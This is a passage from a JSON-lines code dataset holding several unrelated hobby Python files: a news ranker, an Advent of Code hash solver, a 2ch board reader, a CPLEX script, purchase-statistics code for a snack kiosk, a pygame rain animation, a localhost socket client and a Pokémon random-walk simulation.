     # incomplete: presumably meant to append this question and its spendtime to the CSV\n        f = pd.read_csv(\"Interview_questions.csv\")\n        \n    \n\n\nx = Interview_question(\"insert_in_ordered_circular_linkedlist.py\",\"Walmartlab\", \"http://www.careercup.com/question?id=13273690\",\"Linkedlist\")","sub_path":"timesheet.py","file_name":"timesheet.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"61068472","text":"import time\r\nimport json\r\n\r\nclass NewsRank:\r\n\r\n    def __init__(self, docs):\r\n        \"\"\"\r\n\r\n        :type docs: list\r\n        \"\"\"\r\n        self.docs = docs\r\n        self.jsonpath = '/Users/liujingkun/Exp/python/scrapy/SearchSpider/SearchSpider/data/'\r\n        self.result = []\r\n        self.time_dict = {}\r\n        self.create_time_dict()\r\n\r\n    def create_time_dict(self):\r\n        for doc in self.docs:\r\n            with open(self.jsonpath+doc+'.json', 'rt', encoding='utf-8') as jsonfp:\r\n                try:\r\n                    jsondata = json.load(jsonfp)\r\n                except:\r\n                    continue\r\n                # 
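NOTE: each article JSON file is assumed to provide 'id' and 'time' fields; the commented-out call below was debug output.\r\n                # 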
print(jsondata['id'])\r\n self.time_dict[doc] = jsondata['time']\r\n\r\n def ftime(self, doc):\r\n str_t = self.time_dict.get(doc)\r\n t_tuple = time.strptime(str_t, '%Y-%m-%d %H:%M')\r\n f = time.mktime(t_tuple)\r\n return float(f)\r\n\r\n def sort_by_time(self):\r\n self.result = sorted(self.docs, key=lambda doc: self.ftime(doc), reverse=True)\r\n return self.result\r\n\r\n def sort_by_heat(self, heat_dict):\r\n self.result = sorted(self.docs, key=lambda doc: heat_dict.get(doc), reverse=True)\r\n return self.result\r\n\r\nif __name__ == '__main__':\r\n nr = NewsRank([2, 3, 1])\r\n nr.sort_by_heat({1: 3, 2: 4, 3: 1})\r\n print(nr.result)\r\n nr.sort_by_time()\r\n print(nr.result)\r\n","sub_path":"webview/engine/NewsRank.py","file_name":"NewsRank.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"562533142","text":"#!/usr/bin/env python3\n\"\"\"My solution to day 4 of Advent of Code\nhttp://adventofcode.com/day/4\n\"\"\"\n\nimport sys\nimport hashlib\n\nMAX_TRIES = 2**30\n\ndef mine_adventcoin(hash, start):\n i = 0\n\n while i < MAX_TRIES:\n key = (hash + str(i)).encode()\n coin = hashlib.md5(key).hexdigest()\n if coin.startswith(start):\n return i\n i += 1\n return -1\n\nif __name__ == '__main__' and len(sys.argv) > 1 and len(sys.argv[1]) > 0:\n num = mine_adventcoin(sys.argv[1], '00000')\n if num >= 0:\n print('Found number for \"00000\":', num)\n else:\n print('No number smaller than', MAX_TRIES, 'found for \"00000\"')\n\n num = mine_adventcoin(sys.argv[1], '000000')\n if num >= 0:\n print('Found number for \"000000\":', num)\n else:\n print('No number smaller than', MAX_TRIES, 'found for \"000000\"')\n","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22471925","text":"import os\nimport re\n\nfrom .base import Base, Py2chdlerError\nfrom .thread import Thread\n\nclass Board(Base):\n def __init__(self, bbsmenu, board_name, romaji_board_name, board_url):\n self.bbsmenu = bbsmenu\n self.name = board_name\n self.romaji_name = romaji_board_name\n self.url = board_url + \"subject.txt\"\n self.dir_path = self.bbsmenu.settings['base_dir'] + \"/\" + self.romaji_name\n self.filepath = self.dir_path + \"/subject\"\n self.filepath_old = self.dir_path + \"/subject_old\"\n if not os.path.exists(self.dir_path):\n os.mkdir(self.dir_path)\n elif not os.path.isdir(self.dir_path):\n raise Py2chdlerError(self.dir_path + \" is not a directory.\")\n\n def read(self):\n thread_infos = list()\n self.download(self.url, self.filepath)\n subject = set(self.read_file(self.filepath))\n if os.path.exists(self.filepath_old):\n subject_old = set(self.read_file(self.filepath_old))\n else:\n subject_old = set()\n thread_regex = '^([0-9]*)\\.dat<>(.*)\\(([0-9]*)\\)$'\n p_thread = re.compile(thread_regex)\n # list of updated subject from old_subject\n old_subject = subject_old - subject\n # process each line\n for line in subject:\n # seach thread info with regex\n r_thread = p_thread.search(line)\n # if thread info\n if r_thread:\n thread_id = int(r_thread.group(1))\n res_count = int(r_thread.group(3))\n old_res_count = res_count if subject_old else 0\n for old_line in old_subject:\n old_r_thread = p_thread.search(old_line)\n if old_r_thread:\n if thread_id == int(old_r_thread.group(1)):\n old_res_count = int(old_r_thread.group(3))\n break\n new_res_count = res_count - old_res_count\n 
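# new_res_count is the reply growth versus the cached subject_old file: 0 for unchanged threads, and the full res_count on a first run with no cache.\n                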
thread_info = {'id':thread_id, 'title':r_thread.group(2), 'res_count':res_count, 'new_res_count':new_res_count}\n                thread_infos.append(thread_info)\n        return thread_infos\n\n    def read_raw(self):\n        self.download(self.url, self.filepath)\n        raw_subject = self.read_raw_file(self.filepath)\n        return raw_subject\n\n    def get_threads(self, *thread_ids, new=True):\n        threads = list()\n        # list to store existing thread_ids (for error check)\n        exist_thread_ids = list()\n        thread_infos = self.read()\n        # filter updated threads from thread infos\n        if new == True:\n            tmp = list()\n            for thread_info in thread_infos:\n                if not thread_info['new_res_count'] == 0:\n                    tmp.append(thread_info)\n            thread_infos = tmp\n        # if thread_ids is empty get all threads\n        if len(thread_ids) == 0:\n            for thread_info in thread_infos:\n                threads = self.__append_thread(threads, thread_info)\n        else:\n            for thread_info in thread_infos:\n                if thread_info['id'] in thread_ids:\n                    threads = self.__append_thread(threads, thread_info)\n                    exist_thread_ids.append(thread_info['id'])\n            # raise an error if a requested thread_id does not exist\n            if not len(thread_ids) == len(exist_thread_ids):\n                err_thread_ids = set(thread_ids) - set(exist_thread_ids)\n                err_thread_ids = ', '.join(str(t) for t in err_thread_ids)\n                raise Py2chdlerError(\"Thread(s) id: \" + err_thread_ids + \" do(es) not exist, or the same thread was requested more than once.\")\n        return threads\n\n    def get_new_threads(self, *thread_ids):\n        if thread_ids:\n            threads = self.get_threads(*thread_ids, new=True)\n        else:\n            threads = self.get_threads(new=True)\n        return threads\n\n\n    def get_thread(self, thread_id, new=False):\n        threads = self.get_threads(thread_id, new=new)\n        return threads[0]\n\n    def get_new_thread(self, thread_id):\n        thread = self.get_thread(thread_id, new=True) \n        return thread\n\n    def __append_thread(self, threads, thread_info):\n        thread = Thread(self, thread_info['id'], thread_info['title'])\n        threads.append(thread)\n        return threads\n\nif __name__ == '__main__':\n    import time\n    from .bbsmenu import Bbsmenu\n    homedir = os.path.expanduser('~')\n    settings = {'base_dir': os.path.abspath(homedir + '/py2chdler/data')}\n    bbsmenu = Bbsmenu(settings, 'http://menu.2ch.net/bbsmenu.html')\n    boards = bbsmenu.get_boards('news4vip')\n    for board in boards:\n        threads = board.get_threads()\n        for thread in threads:\n            print(thread.title)\n","sub_path":"pytwoch/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"171947929","text":"import cplex.exceptions\n\ntry:\n    my_cplex = cplex.Cplex()\n    my_cplex.read(\"problem3.lp\")\n    my_cplex.solve()\nexcept Exception as e:\n    print(e)\n    print(\"error on Cplex exception!\")\n\nprint(\"Solution value = \", my_cplex.solution.get_objective_value())\nx = my_cplex.solution.get_values()\nprint(\"three months:\")\nfor i in range(4):\n    if x[i] != 0:\n        print(\"month \"+str(i)+\":\"+str(x[i]))\nprint(\"four months:\")\nfor i in range(3):\n    if x[i+4] != 0:\n        print(\"month \"+str(i)+\":\"+str(x[i+4]))\nprint(\"five months:\")\nfor i in range(2):\n    if x[i+7] != 0:\n        print(\"month \"+str(i)+\":\"+str(x[i+7]))\nmy_cplex.solution.write(\"problem3_solution.txt\")\n\n","sub_path":"cplex_test/物流实验-李想2016211876/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"605595730","text":"\"\"\"\r\nAuthor: Nguyen Van Hoang\r\nDate: 
16/09/2021\r\nProblem:Octal numbers have a base of eight and the digits 0–7. Write the scripts octalToDecimal.\r\npy and decimalToOctal.py, which convert numbers between the octal\r\nand decimal representations of integers. These scripts use algorithms that are\r\nsimilar to those of the binaryToDecimal and decimalToBinary scripts developed in Section 4-3.\r\nSolution:\r\n\r\n ....\r\n\"\"\"\r\no_t_n = int(input('Enter a string of octal digits: '))\r\ni = 1\r\ndc = 0\r\nwhile (o_t_n != 0):\r\n rmd = o_t_n % 10\r\n o_t_n //= 10\r\n dc += rmd * i\r\n i *= 8\r\nprint('The integer value is ', dc)\r\n\"\"\"\r\n\"\"\"\r\nd_c_n = int(input('Enter a decimal integer: '))\r\nprint(\"Quotient Remainder Octal\")\r\ni = 1\r\no_c_n = 0\r\nnum = \"\"\r\nwhile (d_c_n != 0):\r\n rm = d_c_n % 8\r\n d_c_n //= 8\r\n o_c_n = o_c_n + rm * i\r\n i *= 10\r\n num = str(rm)+num\r\n print(\"%5d%8d%12s\" % (d_c_n, rm, num))\r\nprint('The octal representation is ', o_c_n)","sub_path":"page_132_project_04.py","file_name":"page_132_project_04.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"285660787","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nfrom models import *\nfrom myfarm.settings import *\n\ndef create_category_top(top_tag, parent_id):\n ertongfang = top_tag.get('children', None)\n depth = 1\n create_category(ertongfang, parent_id, depth)\n\n\ndef create_category(data, parent_id, depth):\n if type(data) in (list, tuple, set):\n if len(data) == 1:\n data = data[0]\n else:\n for item in data:\n create_category(item, parent_id, depth)\n return\n try:\n tag = {\n 'no': generate_uuid(),\n 'state': 1,\n 'depth': depth,\n 'alias_name': data['name'],\n 'name': data['name'],\n 'parent_id': parent_id,\n }\n category, created = Category.objects.get_or_create(**tag)\n except:\n print(\"data:{}, parent_id:{}, depth:{}\".format(data, parent_id, depth))\n parent_id2 = category.id if category else 0\n\n children = data.get('children', None)\n if children:\n depth += 1\n for child in children:\n create_category(child, parent_id2, depth)\n\n\ndef generate_all_categories():\n categorys_tags = ITEM_TAG_SETS['AREA_TAGS']\n import json\n used_tags = [keting_tag, canting_tag, woshi_tag, shufang_tag, ertongfang_tag]\n dict_used_tags = dict()\n for tag in used_tags:\n dict_used_tags.update({tag['name']: {'tag': tag}})\n for data in categorys_tags:\n tag = {\n 'no': generate_uuid(),\n 'state': 1,\n 'depth': 1,\n 'alias_name': data['id'],\n 'name': data['name'],\n }\n category, created = Category.objects.get_or_create(**tag)\n if data['name'] in dict_used_tags.keys():\n dict_used_tags[data['name']].update({'id': category.id})\n for name, dict_value in dict_used_tags.iteritems():\n create_category_top(dict_value['tag'], dict_value['id'])\n\n\n # for i in range(5000000):\n # item = item_sample\n # item['no'] = generate_uuid()\n # item['category'] = random.sample(noes, 5)\n #\n # print(item['no'], item['category'][0])\n # Item(**item).save()\n\ndef generate_item(count=5):\n global NOes\n if not NOes:\n all_noes = Category.objects.only(\"id\") #.filter(state__in=(StateEnum.VALID, StateEnum.TEMPORARY) )\n NOes =[cat.id for cat in all_noes]\n for i in range(count):\n item = item_sample\n # print(\"item:{}\".format(item))\n item['no'] = generate_uuid()\n category_ids = random.sample(NOes, random.randint(2,5))\n # print(\"item_no:{}, category_ids:{}\".format(item['no'],category_ids))\n Item(**item).save()\n for category_id 
in category_ids:\n            item_cat = {'category_id': int(category_id) ,\n                        'item_no': item['no']}\n            itemCat = ItemCategory(**item_cat)\n\n            itemCat.save()\n\n\nif __name__ == '__main__':\n\n    # item = Item(no=generate_uuid(), width=12, height=10, length=10, merchant=['ifuwo', '1jbest', 'yunchao'])\n    # item.save()\n    # item = Item()\n    # item.no = generate_uuid()\n    # item.product_name = 'test'\n    # print item.no\n    # item.save()\n    # model_flag={'octane': 1, 'max': 0, 'model': 1}).save()\n    # comment1 = Comment(content='Good work magic, please continue !')\n    # comment1.save()\n    # comment2 = Comment(content='This is my mongodb orm test, it is nice')\n    # page = Page(comments=[comment1, comment2]).save()\n\n    # generate_all_categories()\n\n    generate_item(5000000)","sub_path":"demo/myfarm/init_models.py","file_name":"init_models.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"158789526","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport datetime\nfrom collections import defaultdict\nimport operator\nfrom helpers import *\nimport sys\nimport db\n\ndef getUser():\n\twhile 1:\n\t\tstring = input('user? ')\n\t\tsession = Session()\n\t\tuser = search_user(string, session)\n\t\tsession.close()\n\t\tif not isinstance(user, list):\t\n\t\t\treturn user.name\n\t\ti=0\n\t\tif len(user)==0:\n\t\t\tprint('no matching string')\n\t\tif len(user)==1:\n\t\t\tprint('antar: ', user[0].name, '\\n')\n\t\t\treturn user[0].name\n\t\tif len(user)>10:\n\t\t\tcontinue\n\t\tfor u in user:\n\t\t\tprint(i, u.name)\n\t\t\ti += 1\n\t\ttry:\n\t\t\tn = int(input ('enter number:'))\n\t\texcept:\n\t\t\tprint('invalid input, restarting')\n\t\t\tcontinue\n\t\tif (n>-1) and (n<len(user)):\n\t\t\treturn user[n].name\n\ndef getProduct():\n\twhile 1:\n\t\tstring = input('product? ')\n\t\tsession = Session()\n\t\tproduct = search_product(string, session)\n\t\tsession.close()\n\t\tif not isinstance(product, list):\n\t\t\treturn product.name\n\t\ti=0\n\t\tif len(product)==0:\n\t\t\tprint('no matching string')\n\t\tif len(product)==1:\n\t\t\tprint('antar: ', product[0].name, '\\n')\n\t\t\treturn product[0].name\n\t\tif len(product)>10:\n\t\t\tcontinue\n\t\tfor u in product:\n\t\t\tprint(i, u.name)\n\t\t\ti += 1\n\t\ttry:\n\t\t\tn = int(input ('enter number:'))\n\t\texcept:\n\t\t\tprint('invalid input, restarting')\n\t\t\tcontinue\n\t\tif (n>-1) and (n<len(product)):\n\t\t\treturn product[n].name\n\nclass Database:\n\t#for products\n\tvarePersonAntall = defaultdict(dict)\n\tvareDatoAntall = defaultdict(list) #dict->array\n\tvareUkedagAntall = defaultdict(list)\n\t#for persons\n\tpersonVareAntall = defaultdict(dict) #personVareAntall[trygvrad][Oreo] == 3\n\tpersonVareVerdi = defaultdict(dict) #personVareVerdi[trygvrad][Oreo] == 30 #[kr]\n\tpersonDatoVerdi = defaultdict(list) #dict->array\n\tpersonUkedagVerdi = defaultdict(list)\n\t#for global\n\tpersonPosTransactions = {} # personPosTransactions[trygvrad] == 100 #trygvrad has put 100kr in the box\n\tpersonNegTransactions = {} # personNegTransactions[trygvrad] == 70 #trygvrad has taken 70kr from the box\n\tglobalVareAntall = {}#globalVareAntall[Oreo] == 3\n\tglobalVareVerdi = {}#globalVareVerdi[Oreo] == 30 #[kr]\n\tglobalPersonAntall = {}#globalPersonAntall[trygvrad] == 3\n\tglobalPersonForbruk = {}#globalPersonForbruk[trygvrad] == 30 #[kr]\n\tglobalUkedagForbruk = []\n\tglobalDatoVarer = [] \n\tglobalDatoForbruk = []\n\tpengebeholdning = []\n\nclass InputLine:\n\tdef __init__(self, u, p, t):\n\t\tself.inputUser = u\n\t\tself.inputProduct = p\n\t\tself.inputType = t\n\ndef getDateDb(date, inp):\n\ttry:\n\t\tyear = inp.partition('-')\n\t\tmonth = year[2].partition('-')\n\t\treturn datetime.datetime(int(year[0]), int(month[0]), int(month[2]))\n\texcept:\n\t\tprint('invalid date, setting date to date found in db')\n\t\tprint(date)\n\t\treturn date\n\ndef dateToDateNumDb(date, startDate):\n\tdeltaDays = date-startDate\n\treturn int(deltaDays.days), date.weekday()\n\ndef getInputType():\n\tinp = 0\n\twhile not (inp == '1' or inp == '2' or inp == '3' or inp == '4'):\n\t\tprint('type 1 for user-statistics')\n\t\tprint('type 2 for 
product-statistics')\n\t\tprint('type 3 for global-statistics')\n\t\tprint('type 4 to enter loop-mode')\n\t\tinp = input('')\n\treturn int(inp)\n\ndef getProducts(products):\n\tproduct = []\n\tproducts = products.partition('¤')\n\tproduct.append(products[0])\n\twhile (products[1]=='¤'):\n\t\tproducts = products[2].partition('¤')\n\t\tproduct.append(products[0])\n\treturn product\n\ndef getDateFile(date, inp):\n\ttry:\n\t\tyear = inp.partition('-')\n\t\tmonth = year[2].partition('-')\n\t\treturn datetime.date(int(year[0]), int(month[0]), int(month[2]))\t\n\texcept:\n\t\tprint('invalid date, setting date to date found on file file')\n\t\tprint(date)\n\t\treturn datetime.date(int(date.partition('-')[0]), int(date.partition('-')[2].partition('-')[0]), int(date.partition('-')[2].partition('-')[2]))\n\ndef dateToDateNumFile(date, startDate):\n\tyear = date.partition('-')\n\tmonth = year[2].partition('-')\n\tday = datetime.date(int(year[0]), int(month[0]), int(month[2]))\n\tdeltaDays = day-startDate\n\treturn int(deltaDays.days), day.weekday()\n\t\ndef clearDatabase(database):\n\tdatabase.varePersonAntall.clear()\n\tdatabase.vareDatoAntall.clear()\n\tdatabase.vareUkedagAntall.clear()\n\tdatabase.personVareAntall.clear()\n\tdatabase.personVareVerdi.clear()\n\tdatabase.personDatoVerdi.clear()\n\tdatabase.personUkedagVerdi.clear()\n\tdatabase.personPosTransactions.clear()\n\tdatabase.personNegTransactions.clear()\n\tdatabase.globalVareAntall.clear()\n\tdatabase.globalVareVerdi.clear()\n\tdatabase.globalPersonAntall.clear()\n\tdatabase.globalPersonForbruk.clear()\n\treturn(database)\n\ndef addLineToDatabase(database, inputLine):\n\tif abs(inputLine.price)>90000:\n\t\treturn database\n\t#fyller inn for varer\n\tif (not inputLine.product=='') and ((inputLine.inputProduct=='') or (inputLine.inputProduct==inputLine.product)):\n\t\tdatabase.varePersonAntall[inputLine.product][inputLine.user] = database.varePersonAntall[inputLine.product].setdefault(inputLine.user,0) + 1\t\n\t\tif inputLine.product not in database.vareDatoAntall:\n\t\t\tdatabase.vareDatoAntall[inputLine.product] = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.vareDatoAntall[inputLine.product][inputLine.dateNum] += 1\n\t\tif inputLine.product not in database.vareUkedagAntall:\n\t\t\tdatabase.vareUkedagAntall[inputLine.product] = [0]*7\n\t\tdatabase.vareUkedagAntall[inputLine.product][inputLine.weekday] += 1\n\t#fyller inn for personer\n\tif (inputLine.inputUser=='') or (inputLine.inputUser==inputLine.user):\n\t\tif not inputLine.product == '':\n\t\t\tdatabase.personVareAntall[inputLine.user][inputLine.product] = database.personVareAntall[inputLine.user].setdefault(inputLine.product,0) + 1\n\t\t\tdatabase.personVareVerdi[inputLine.user][inputLine.product] = database.personVareVerdi[inputLine.user].setdefault(inputLine.product,0) + inputLine.price\n\t\t\tif inputLine.user not in database.personDatoVerdi:\n\t\t\t\tdatabase.personDatoVerdi[inputLine.user] = [0]*(inputLine.numberOfDays+1)\n\t\t\tdatabase.personDatoVerdi[inputLine.user][inputLine.dateNum] += inputLine.price\n\t\t\tif inputLine.user not in database.personUkedagVerdi:\n\t\t\t\tdatabase.personUkedagVerdi[inputLine.user] = [0]*7\n\t\t\tdatabase.personUkedagVerdi[inputLine.user][inputLine.weekday] += inputLine.price\n\t#fyller inn delt statistikk (genereres uansett)\n\tif (inputLine.product==''):\n\t\tif (inputLine.price>0):\n\t\t\tdatabase.personPosTransactions[inputLine.user] = database.personPosTransactions.setdefault(inputLine.user,0) + 
inputLine.price\n\t\telse:\n\t\t\tdatabase.personNegTransactions[inputLine.user] = database.personNegTransactions.setdefault(inputLine.user,0) + inputLine.price\n\telif not (inputLine.inputType==1):\n\t\tdatabase.globalVareAntall[inputLine.product] = database.globalVareAntall.setdefault(inputLine.product,0) + 1\n\t\tdatabase.globalVareVerdi[inputLine.product] = database.globalVareVerdi.setdefault(inputLine.product,0) + inputLine.price\n\t\t\t\t\t\n\t#fyller inn for global statistikk\n\tif (inputLine.inputType==3) or (inputLine.inputType==4):\n\t\tdatabase.pengebeholdning[inputLine.dateNum] += inputLine.price\n\t\tif not (inputLine.product==''):\n\t\t\tdatabase.globalPersonAntall[inputLine.user] = database.globalPersonAntall.setdefault(inputLine.user,0) + 1\n\t\t\tdatabase.globalPersonForbruk[inputLine.user] = database.globalPersonForbruk.setdefault(inputLine.user,0) + inputLine.price\n\t\t\tdatabase.globalDatoVarer[inputLine.dateNum] += 1\n\t\t\tdatabase.globalDatoForbruk[inputLine.dateNum] += inputLine.price\n\t\t\tdatabase.globalUkedagForbruk[inputLine.weekday] += inputLine.price\n\treturn database\n\ndef buildDatabaseFromDb(inputType, inputProduct, inputUser):\n\tsdate = input('enter start date (yyyy-mm-dd)? ')\n\tedate = input('enter end date (yyyy-mm-dd)? ')\n\tprint('building database...')\t\n\tsession = Session()\n\ttransaction_list = session.query(Transaction).all()\n\tinputLine = InputLine(inputUser, inputProduct, inputType)\n\tstartDate = getDateDb(transaction_list[0].time, sdate)\n\tendDate = getDateDb(transaction_list[-1].time, edate)\n\tinputLine.numberOfDays = (endDate-startDate).days\n\tdatabase = Database()\n\tdatabase = clearDatabase(database)\n\n\tif (inputType==3) or (inputType==4):\n\t\tdatabase.globalDatoVarer = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalDatoForbruk = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalUkedagForbruk = [0]*7\n\t\tdatabase.pengebeholdning = [0]*(inputLine.numberOfDays+1)\n\tprint('wait for it.... 
')\n\tfor transaction in transaction_list:\n\t\tif transaction.purchase:\n\t\t\tproducts = [ent.product.name for ent in transaction.purchase.entries]\n\t\telse:\n\t\t\tproducts = []\n\t\t\tproducts.append('')\n\t\tinputLine.dateNum, inputLine.weekday = dateToDateNumDb(transaction.time, startDate)\n\t\tif inputLine.dateNum<0 or inputLine.dateNum>(inputLine.numberOfDays):\n\t\t\tcontinue\n\t\tinputLine.user=transaction.user.name\n\t\tinputLine.price=transaction.amount\n\t\tfor inputLine.product in products:\t\n\t\t\tdatabase=addLineToDatabase(database, inputLine )\n\t\t\tinputLine.price = 0\n\n\tprint('saving as default.dibblerlog...', end=' ')\n\tf=open('default.dibblerlog','w', encoding='utf8')\t\n\tline_format = '%s|%s|%s|%s|%s|%s\\n'\n\ttransaction_list = session.query(Transaction).all()\n\tfor transaction in transaction_list:\n\t\tif transaction.purchase:\n\t\t\tproducts = '¤'.join([ent.product.name for ent in transaction.purchase.entries])\n\t\t\tdescription = ''\n\t\telse:\n\t\t\tproducts = ''\n\t\t\tdescription = transaction.description\n\t\tline = line_format % ('purchase', transaction.time, products, transaction.user.name, transaction.amount, description)\n\t\tf.write(line)\n\tsession.close()\n\tf.close()\n\t#build database.pengebeholdning\n\tif (inputType==3) or (inputType==4):\n\t\tfor i in range(inputLine.numberOfDays+1):\n\t\t\tif i > 0:\n\t\t\t\tdatabase.pengebeholdning[i] +=database.pengebeholdning[i-1]\n\t#build dateLine\n\tday=datetime.timedelta(days=1)\n\tdateLine=[]\n\tdateLine.append(startDate)\n\tfor n in range(inputLine.numberOfDays):\n\t\tdateLine.append(startDate+(n+1)*day)\n\tprint('done')\n\treturn database, dateLine\n\ndef buildDatabaseFromFile(inputFile, inputType, inputProduct, inputUser):\n\tsdate = input('enter start date (yyyy-mm-dd)? ')\n\tedate = input('enter end date (yyyy-mm-dd)? 
')\n\t\t\n\tf=open(inputFile)\n\ttry:\n\t\tfileLines=f.readlines()\n\tfinally:\n\t\tf.close()\n\tinputLine = InputLine(inputUser, inputProduct, inputType)\n\tstartDate = getDateFile(fileLines[0].partition('|')[2].partition(' ')[0], sdate)\n\tendDate = getDateFile(fileLines[-1].partition('|')[2].partition(' ')[0], edate)\n\tinputLine.numberOfDays = (endDate-startDate).days\n\tdatabase = Database()\n\tdatabase = clearDatabase(database)\n\n\tif (inputType==3) or (inputType==4):\n\t\tdatabase.globalDatoVarer = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalDatoForbruk = [0]*(inputLine.numberOfDays+1)\n\t\tdatabase.globalUkedagForbruk = [0]*7\n\t\tdatabase.pengebeholdning = [0]*(inputLine.numberOfDays+1)\n\tfor linje in fileLines:\n\t\tif not (linje[0]=='#') and not (linje=='\\n') :\n\t\t\t#henter dateNum, products, user, price\n\t\t\trestDel = linje.partition('|')\n\t\t\trestDel = restDel[2].partition(' ')\n\t\t\tinputLine.dateNum, inputLine.weekday = dateToDateNumFile(restDel[0], startDate)\n\t\t\tif inputLine.dateNum<0 or inputLine.dateNum>(inputLine.numberOfDays):\n\t\t\t\tcontinue\n\t\t\trestDel=restDel[2].partition('|')\n\t\t\trestDel=restDel[2].partition('|')\n\t\t\tproducts = restDel[0]\n\t\t\trestDel=restDel[2].partition('|')\n\t\t\tinputLine.user=restDel[0]\n\t\t\tinputLine.price=int(restDel[2].partition('|')[0])\n\t\t\tfor inputLine.product in getProducts(products):\t\n\t\t\t\tdatabase=addLineToDatabase(database, inputLine )\n\t\t\t\tinputLine.price = 0;\n\t#bygg database.pengebeholdning\n\tif (inputType==3) or (inputType==4):\n\t\tfor i in range(inputLine.numberOfDays+1):\n\t\t\tif i > 0:\n\t\t\t\tdatabase.pengebeholdning[i] +=database.pengebeholdning[i-1]\n\t#bygg dateLine\n\tday=datetime.timedelta(days=1)\n\tdateLine=[]\n\tdateLine.append(startDate)\n\tfor n in range(inputLine.numberOfDays):\n\t\tdateLine.append(startDate+n*day)\n\treturn database, dateLine\n\ndef printTopDict(dictionary, n, k):\n\ti=0\n\tfor key in sorted(dictionary, key=dictionary.get, reverse=k):\n\t\tprint(key, ': ',dictionary[key]) \n\t\tif i= self.screen_size[1]:\n self.y = randint(-100, self.screen_size[1] -\n self.screen_size[1] / 4)\n self.x = randint(0, self.screen_size[0])\n self.speed = randint(1, 3)\n self.y += self.speed\n self.speed += 0.01\n\n def show(self):\n self.pygame.draw.rect(self.screen, self.color,\n [self.x, self.y, self.w, self.h])\n\npygame.init()\npygame.display.set_caption('purple rain', 'rain-64.ico')\nicon = pygame.image.load('C:/Users/ENBSF/Documents/\\\nlul_dev/thecodingtrain/assets/rain-64.ico')\npygame.display.set_icon(icon)\nsize = width, height = 800, 600\n\nscreen = pygame.display.set_mode(size)\ndrops = [Drop(pygame, screen) for _ in range(500)]\nrun = 1\n\nwhile run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = 0\n\n screen.fill(pygame.Color(220, 220, 250, 1))\n for i in range(500):\n drops[i].fall()\n\n for i in range(500):\n drops[i].show()\n pygame.display.update()\n\npygame.quit()\n","sub_path":"purple_rain.py","file_name":"purple_rain.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355593798","text":"# Echo server program\nimport socket\nimport struct\n\nHOST = '127.0.0.1' # The remote host\nPORT = 7777 # The same port as used by the server\n\nisquit=False\n\nwhile True:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(5.0)\n s.connect((HOST, PORT))\n print('connect success')\n while True:\n try:\n 
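# NOTE: raw_input and sending a plain str over the socket are Python 2 idioms; a Python 3 port would use input() and s.sendall(mycmd.encode()).\n            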
cmd=raw_input('#')\n param=cmd.split(' ')\n mycmd=''\n for i in range(len(param)):\n mycmd=mycmd+param[i]\n mycmd=mycmd+' '\n mycmd=mycmd+\"\\r\\n\"\n s.sendall(mycmd)\n data = s.recv(1024)\n print(data)\n except:\n print('lose connection')\n cmd=raw_input(\"?reconnect[yes/no]\")\n if cmd == \"yes\":\n break\n else:\n isquit=True\n break\n if isquit:\n break\n s.close()\n\n\n","sub_path":"tools/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"588115498","text":"import random\n\n#Runs a single 250 step simulation\ndef run_one_simulation(trainerLoc, capturesOnGrid, prob):\n count = 0\n totalPkmn = 0\n #Loops through 250 times for one simulation\n while(count<250):\n returnedTuple = move_trainer(trainerLoc, bounds, prob)\n trainerLoc = returnedTuple[0]\n isCaught = returnedTuple[1]\n if(isCaught ==1):\n capturesOnGrid[trainerLoc[0]][trainerLoc[1]] += 1 #Appends the grid if there is a pokemon at the location\n totalPkmn += 1\n count+=1\n return (capturesOnGrid, totalPkmn)\n\n\n#Checks boundaries, proceeds with direction, returns a tuple with new location\n#And whether a pokemon was caught or not\ndef move_trainer(location, bounds, prob):\n direction = random.randint(0, 3)\n \n #Boundary Definiton (Still catches pokemon at location)\n if(location[0] < 1 and direction == 0): #North\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0)\n \n elif(location[0] > bounds[0]-1 and direction == 1): #South\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0) \n \n elif(location[1] > bounds[1]-1 and direction == 2): #East\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0)\n \n elif(location[1] < 1 and direction == 3): #West\n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (location, 1)\n else:\n return (location, 0) \n \n #Proceeds with the direction movement\n else:\n if(direction == 0): #North\n newLocation = (location[0] - 1, location[1])\n elif(direction == 1): #South\n newLocation = (location[0] + 1, location[1])\n elif(direction == 2): #East\n newLocation = (location[0], location[1] + 1) \n else: #West\n newLocation = (location[0], location[1] - 1)\n \n #Pokemon Probability Catcher\n chance = random.random()\n if(chance < prob):\n return (newLocation, 1)\n else:\n return 